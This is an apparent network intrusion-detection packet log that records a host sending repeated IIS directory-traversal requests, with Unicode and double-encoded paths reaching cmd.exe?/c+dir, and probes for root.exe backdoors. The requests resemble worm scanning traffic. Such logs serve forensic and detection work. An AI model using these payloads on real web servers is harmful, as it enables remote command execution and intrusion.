137.189.161.199:4447 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:59428 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7AE5  Ack: 0x3FC69606  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.762738 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:4447 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:59684 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372D7AE5  Ack: 0x3FC69606  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 30 25 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c0%2f../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.768944 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4447 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:60452 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7B46  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.768946 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4447 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:60708 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7B46  Ack: 0x372D7B46  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.768951 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4450 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:60964 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7B87  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.770908 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4450 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:62244 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7B88  Ack: 0x3FC9700D  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.770971 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:4450 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:62500 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372D7B88  Ack: 0x3FC9700D  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 30 25 61 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c0%af../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.777792 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4450 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:63524 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7BE9  Ack: 0x3FC971CC  Win: 0xAA42  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.777954 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4450 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:63780 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7BE9  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.780577 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4453 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:64036 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7B09  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.782257 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4453 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:65316 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7B0A  Ack: 0x3FCB3D66  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.783547 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:4453 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:293 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372D7B0A  Ack: 0x3FCB3D66  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 31 25 39 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%9c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.789587 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4453 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:1061 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7B6B  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.789913 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4453 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:1317 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7B6B  Ack: 0x372D7B6B  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.789956 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4457 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:1573 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7B2E  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.791551 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4457 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:1829 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7B2F  Ack: 0x3FCE3D3B  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.791614 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x98
137.189.161.199:4457 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:2085 IpLen:20 DgmLen:138 DF
***AP*** Seq: 0x372D7B2F  Ack: 0x3FCE3D3B  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
25 33 35 25 36 33 2E 2E 2F 77 69 6E 6E 74 2F 73  %35%63../winnt/s
79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F  ystem32/cmd.exe?
2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D  /c+dir HTTP/1.0.
0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E  .Host: www..Conn
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A  nection: close..
0D 0A                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.795322 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4457 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:2341 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7B91  Ack: 0x3FCE3D3B  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.795691 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4457 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:2597 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7B91  Ack: 0x372D7B91  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.795692 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4458 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:2853 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7B6D  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.797453 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4458 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:3109 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7B6E  Ack: 0x3FD1126E  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.797484 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:4458 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:3365 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372D7B6E  Ack: 0x3FD1126E  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
25 33 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  %35c../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.802039 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4458 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:5157 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7BCE  Ack: 0x3FD1141F  Win: 0xAA50  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.802734 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4458 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:5669 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7BCE  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.804497 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4465 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:6949 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7B63  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.806649 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4465 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:8997 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7B64  Ack: 0x3FD58A5C  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.806668 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x9A
137.189.161.199:4465 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:9253 IpLen:20 DgmLen:140 DF
***AP*** Seq: 0x372D7B64  Ack: 0x3FD58A5C  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 25 33 35 25 36 33 2E 2E 2F 77 69 6E 6E 74  25%35%63../winnt
2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78  /system32/cmd.ex
65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E  e?/c+dir HTTP/1.
30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F  0..Host: www..Co
6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65  nnnection: close
0D 0A 0D 0A                                      ....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.813891 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4465 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:12069 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7BC8  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.813896 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4465 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:12325 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7BC8  Ack: 0x372D7BC8  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.814819 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4471 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:12837 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7B87  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.816950 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4471 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:15397 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7B88  Ack: 0x3FD90908  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.816974 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:4471 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:15909 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372D7B88  Ack: 0x3FD90908  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  252f../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.823708 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4471 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:18469 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7BE8  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.824198 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4471 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:18725 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7BE8  Ack: 0x372D7BE8  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.675142 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4673 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:22055 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7E93  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.676820 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4673 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:22311 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7E94  Ack: 0xEE22DAE5  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.676959 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x7E
137.189.161.199:4673 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:22567 IpLen:20 DgmLen:112 DF
***AP*** Seq: 0x372D7E94  Ack: 0xEE22DAE5  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F  GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54  t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77  P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63  ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A                          lose....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.683114 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4673 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:24615 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7EDC  Ack: 0x911BD6C2  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.683740 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4677 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:24871 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7EA8  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.686787 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4677 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:25639 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7EA9  Ack: 0xEE22ED80  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.686792 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x7C
137.189.161.199:4677 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:25895 IpLen:20 DgmLen:110 DF
***AP*** Seq: 0x372D7EA9  Ack: 0xEE22ED80  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 4D 53 41 44 43 2F 72 6F 6F 74 2E  GET /MSADC/root.
65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F  exe?/c+dir HTTP/
31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A  1.0..Host: www..
43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  Connnection: clo
73 65 0D 0A 0D 0A                                se....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.691853 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4677 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:27943 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7EEF  Ack: 0xA514BFE6  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.693217 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4682 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:28711 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7EA3  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.694844 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4682 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:29479 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7EA4  Ack: 0xEE2432DF  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.694988 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x86
137.189.161.199:4682 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:29735 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x372D7EA4  Ack: 0xEE2432DF  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73  GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.701946 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4682 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:30247 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7EF4  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.702068 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4686 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:31015 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7EB1  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.703986 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4686 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:31271 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7EB2  Ack: 0xEE2480B7  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.704493 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x86
137.189.161.199:4686 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:31527 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x372D7EB2  Ack: 0xEE2480B7  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73  GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
